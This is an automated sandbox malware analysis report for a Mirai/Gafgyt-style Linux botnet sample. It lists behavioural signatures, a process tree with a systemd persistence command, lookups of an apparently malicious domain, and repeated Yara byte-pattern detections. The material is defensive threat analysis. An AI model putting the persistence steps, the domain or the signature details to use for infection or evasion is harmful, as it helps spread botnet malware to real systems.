Edit tour

Linux Analysis Report
i586.elf

Overview

General Information

Sample name:	i586.elf
Analysis ID:	1583211
MD5:	a4308d0cf09d2f1bc259627e7b91252d
SHA1:	4884f55dd9bf34015caab7ec130546fa9cb84a93
SHA256:	cfd0be6379b1a3b95bfe58c8e724f246646fa07d94ab186f611f4d7b5e8e557c
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Deletes system log files

Machine Learning detection for sample

Manipulation of devices in /dev

Sample deletes itself

Creates hidden files and/or directories

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample tries to kill a process (SIGKILL)

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583211
Start date and time:	2025-01-02 08:51:01 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	i586.elf
Detection:	MAL
Classification:	mal72.evad.linELF@0/3@54/0

Warnings

VT rate limit hit for: tcpdown.su
VT rate limit hit for: tcpdown.su
VT rate limit hit for: tcpdown.su

Runtime Messages

Command:	/tmp/i586.elf
PID:	6263
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	made you my bitch
Standard Error:

Process Tree

system is lnxubuntu20

i586.elf (PID: 6263, Parent: 6188, MD5: a4308d0cf09d2f1bc259627e7b91252d) Arguments: /tmp/i586.elf

i586.elf New Fork (PID: 6264, Parent: 6263)

i586.elf New Fork (PID: 6265, Parent: 6264)

i586.elf New Fork (PID: 6441, Parent: 6265)

i586.elf New Fork (PID: 6442, Parent: 6265)

i586.elf New Fork (PID: 6443, Parent: 6265)

i586.elf New Fork (PID: 6444, Parent: 6265)

i586.elf New Fork (PID: 6445, Parent: 6265)

i586.elf New Fork (PID: 6450, Parent: 6265)

i586.elf New Fork (PID: 6451, Parent: 6265)

i586.elf New Fork (PID: 6452, Parent: 6265)

i586.elf New Fork (PID: 6457, Parent: 6265)

i586.elf New Fork (PID: 6458, Parent: 6265)

i586.elf New Fork (PID: 6482, Parent: 6265)

i586.elf New Fork (PID: 6484, Parent: 6265)

i586.elf New Fork (PID: 6489, Parent: 6265)

i586.elf New Fork (PID: 6491, Parent: 6265)

i586.elf New Fork (PID: 6495, Parent: 6265)

i586.elf New Fork (PID: 6496, Parent: 6265)

i586.elf New Fork (PID: 6521, Parent: 6265)

i586.elf New Fork (PID: 6523, Parent: 6265)

i586.elf New Fork (PID: 6528, Parent: 6265)

i586.elf New Fork (PID: 6530, Parent: 6265)

i586.elf New Fork (PID: 6535, Parent: 6265)

i586.elf New Fork (PID: 6536, Parent: 6265)

i586.elf New Fork (PID: 6538, Parent: 6265)

i586.elf New Fork (PID: 6544, Parent: 6265)

i586.elf New Fork (PID: 6545, Parent: 6265)

i586.elf New Fork (PID: 6549, Parent: 6265)

i586.elf New Fork (PID: 6551, Parent: 6265)

i586.elf New Fork (PID: 6555, Parent: 6265)

i586.elf New Fork (PID: 6557, Parent: 6265)

i586.elf New Fork (PID: 6563, Parent: 6265)

i586.elf New Fork (PID: 6564, Parent: 6265)

i586.elf New Fork (PID: 6566, Parent: 6265)

i586.elf New Fork (PID: 6572, Parent: 6265)

i586.elf New Fork (PID: 6574, Parent: 6265)

i586.elf New Fork (PID: 6578, Parent: 6265)

i586.elf New Fork (PID: 6580, Parent: 6265)

i586.elf New Fork (PID: 6585, Parent: 6265)

i586.elf New Fork (PID: 6586, Parent: 6265)

i586.elf New Fork (PID: 6593, Parent: 6265)

i586.elf New Fork (PID: 6594, Parent: 6265)

i586.elf New Fork (PID: 6597, Parent: 6265)

i586.elf New Fork (PID: 6599, Parent: 6265)

i586.elf New Fork (PID: 6603, Parent: 6265)

i586.elf New Fork (PID: 6605, Parent: 6265)

i586.elf New Fork (PID: 6266, Parent: 6264)

i586.elf New Fork (PID: 6268, Parent: 6266)

i586.elf New Fork (PID: 6267, Parent: 6264)

sh (PID: 6267, Parent: 6264, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"

sh New Fork (PID: 6269, Parent: 6267)

systemctl (PID: 6269, Parent: 6267, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

i586.elf New Fork (PID: 6284, Parent: 6264)

sh (PID: 6284, Parent: 6264, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"

sh New Fork (PID: 6285, Parent: 6284)

systemctl (PID: 6285, Parent: 6284, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service

systemd New Fork (PID: 6271, Parent: 6270)

snapd-env-generator (PID: 6271, Parent: 6270, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 6287, Parent: 6286)

snapd-env-generator (PID: 6287, Parent: 6286, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

gnome-session-binary New Fork (PID: 6295, Parent: 1477)

sh (PID: 6295, Parent: 1477, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill

gsd-rfkill (PID: 6295, Parent: 1477, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill

systemd New Fork (PID: 6302, Parent: 1)

systemd-hostnamed (PID: 6302, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed

gdm3 New Fork (PID: 6435, Parent: 1320)

Default (PID: 6435, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

gdm3 New Fork (PID: 6438, Parent: 1320)

Default (PID: 6438, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
i586.elf	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
i586.elf	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
i586.elf	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
i586.elf	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
i586.elf	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
i586.elf	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
i586.elf	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
6452.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6452.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6452.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6452.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6452.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6452.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6452.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6451.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6451.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6451.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6451.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6451.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6451.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6451.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6441.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6441.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6441.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6441.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6441.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6441.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6441.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6263.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6263.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6263.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6263.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6263.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6263.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6263.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6457.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6457.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6457.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6457.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6457.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6457.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6457.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6495.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6495.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6495.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6495.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6495.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6495.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6495.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6585.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6585.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6585.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6585.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6585.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6585.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6585.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6551.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6551.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6551.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6551.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6551.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6551.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6551.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6549.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6549.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6549.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6549.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6549.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6549.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6549.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6580.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6580.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6580.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6580.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6580.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6580.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6580.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6535.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6535.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6535.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6535.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6535.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6535.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6535.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6572.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
6572.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x5340:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
6572.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_5f7b67b8	unknown	unknown	0xd038:$a: 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C
6572.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0x83e2:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
6572.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xc091:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
6572.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xa8c6:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
6572.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0x83b2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
6605.1.0000000008048000.0000000008059000.r-x.sdmp	Linux_Trojan_Gafgyt_5bf62ce4	unknown	unknown	0xc3a5:$a: 89 E5 56 53 31 F6 8D 45 10 83 EC 10 89 45 F4 8B 55 F4 46 8D
